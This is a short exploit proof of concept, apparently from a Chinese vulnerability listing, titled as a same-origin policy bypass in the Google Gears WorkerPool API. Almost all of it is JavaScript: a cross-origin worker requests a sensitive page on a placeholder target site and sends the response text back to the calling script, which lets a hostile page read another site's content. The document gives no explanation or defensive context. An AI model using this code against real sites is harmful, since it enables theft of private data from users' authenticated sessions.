Google Gears WorkerPool API绕过同源策略漏洞

                                                var wp = google.gears.workerPool;
wp.allowCrossOrigin();
wp.onmessage = function(a, b, message) {
  var request = google.gears.factory.create(\'beta.httprequest\');

  request.open(\'GET\', \'http://TARGET.SITE/SENSITIVE_PAGE.htm\');
   request.onreadystatechange = function() {
     if (request.readyState == 4) {
     wp.sendMessage(\"The response was: \" +
     request.responseText, message.sender);
     }
   };
request.send();
}